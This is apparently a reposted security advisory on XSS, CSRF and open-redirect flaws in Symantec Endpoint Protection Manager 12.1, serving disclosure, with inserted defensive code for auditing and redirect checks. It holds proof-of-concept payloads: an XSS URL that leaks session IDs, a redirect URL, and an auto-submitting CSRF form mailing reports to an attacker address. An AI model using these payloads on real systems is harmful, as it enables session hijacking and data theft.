Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities


SUBMITTED BY: sahertian

DATE: June 30, 2016, 4:49 p.m.

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec

Vendor:
================
www.symantec.com

Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1

SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.

Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
Open Redirect

CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect

Vulnerability Details:
=====================
The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
these vulnerabilities require access to the SEP Management console.

References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01

Exploit code(s):
===============
In this case XSS can bypass the "HttpOnly" cookie protection because the
SEPM application writes and stores the session ID within various
JavaScript functions used by the application within the DOM, thereby
exposing it directly to the XSS attack:

1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm

So all we need to do is alert() any one of those functions, e.g.
alert(createModalDialogFromURL), and it will leak the session ID, essentially
throwing the HttpOnly secure cookie protection flag into the garbage.

e.g.

XSS PoC, defeat HttpOnly flag and access PHPSESSID:

https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
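The defect above is a server-side template writing the session ID into the source of a JavaScript function, so any script execution (or simply stringifying the function) reads a value HttpOnly was meant to hide. The following is an added example, not code from the advisory or from SEPM: a vulnerable and a fixed render of such a page plus an audit routine that flags a secret appearing in inline script or event-handler attributes; the session value and page markup are constructed.

```javascript
// Constructed sample session identifier (not a real token).
const SESSION_ID = "c0nstructedSessionId1234";

// Vulnerable pattern: the session token is interpolated into function source.
// Anything that can run script, or just read String(fn), sees the token, so
// the HttpOnly flag on the cookie no longer protects it.
function renderVulnerable(sessionId) {
  return `<html><body>
<script>
function createModalDialogFromURL(url) {
  return window.open(url + "?PHPSESSID=${sessionId}", "modal");
}
</script></body></html>`;
}

// Fixed pattern: the script never sees the token. The server reads the
// session from the HttpOnly cookie the browser attaches by itself.
function renderFixed() {
  return `<html><body>
<script>
function createModalDialogFromURL(url) {
  return window.open(url, "modal");
}
</script></body></html>`;
}

// Audit: collect every inline <script> body and every on*= handler attribute
// and report those that contain the secret. Returns an array of findings.
function auditInlineScripts(html, secret) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const handlerRe = /\son[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    if (m[1].includes(secret)) {
      findings.push({ where: "inline-script", snippet: m[1].trim().slice(0, 80) });
    }
  }
  while ((m = handlerRe.exec(html)) !== null) {
    const body = m[1] !== undefined ? m[1] : m[2];
    if (body.includes(secret)) {
      findings.push({ where: "event-handler", snippet: body.slice(0, 80) });
    }
  }
  return findings;
}
```

Running the audit over every authenticated page of a console as a regression test catches this class of leak without needing an XSS to demonstrate it.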
Open Redirect in externalurl.php script:
=========================================
A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing, if the victim clicks on a link
supplied by an attacker.

e.g.

https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
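The fix for an endpoint like the one above is to resolve the url= value the way a browser would and compare the resulting host against the set of authorized destinations. The following is an added example, not the vendor's code: the console origin and the authorized host names are constructed assumptions.

```javascript
// Assumed console origin and allowlist of hosts reports may be routed to.
const APP_ORIGIN = "https://sepm.example.internal:8445";
const AUTHORIZED_HOSTS = new Set(["reports.example.internal", "sepm.example.internal"]);

// Returns the absolute URL to redirect to, or null when the candidate must be
// refused. The WHATWG URL parser resolves protocol-relative ("//evil"),
// backslash ("https:\\evil") and userinfo ("https://good@evil") forms the way
// a browser would, so the host comparison sees the real destination.
function safeRedirectTarget(candidate) {
  if (typeof candidate !== "string" || candidate.length === 0 || candidate.length > 2048) return null;
  // Refuse control characters and whitespace that some parsers silently strip.
  if (/[\u0000-\u0020\u007f]/.test(candidate)) return null;
  let target;
  try {
    target = new URL(candidate, APP_ORIGIN); // relative paths resolve to our own origin
  } catch {
    return null;
  }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null; // no javascript:, data:, ...
  if (target.username !== "" || target.password !== "") return null;           // no https://good@evil
  if (!AUTHORIZED_HOSTS.has(target.hostname)) return null;
  return target.href;
}
```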
Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgery issues exist in a couple of places within this
version of SEPM. Below is an example of sending a scheduled report to
a remote attacker's email address if the currently logged-in user visits a malicious
web page or clicks an infected link, etc.

Symantec Reporting Admin CSRF PoC:

<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php" method="POST">
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>
Disclosure Timeline:
============================================
Vendor Notification: February 11, 2016
Vendor Acknowledges Report: February 12, 2016
Vendor Releases Fix: June 28, 2016
Public Disclosure: June 29, 2016

Exploitation Technique:
=======================
Remote

Severity Level(s):
====================
Cross Site Scripting: Medium
  CVSS v2 6.8  AV:A/AC:M/Au:S/C:C/I:C/A:N
  CVSS v3 6.7  AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Cross Site Request Forgery: High
  CVSS v2 7.0  AV:A/AC:M/Au:M/C:C/I:C/A:C
  CVSS v3 7.1  AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Open Redirect: Medium
  CVSS v2 4.1  AV:A/AC:L/Au:S/C:P/I:P/A:N
  CVSS v3 4.1  AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Source ex-db http://goo.gl/pI24pX

Thank you :)
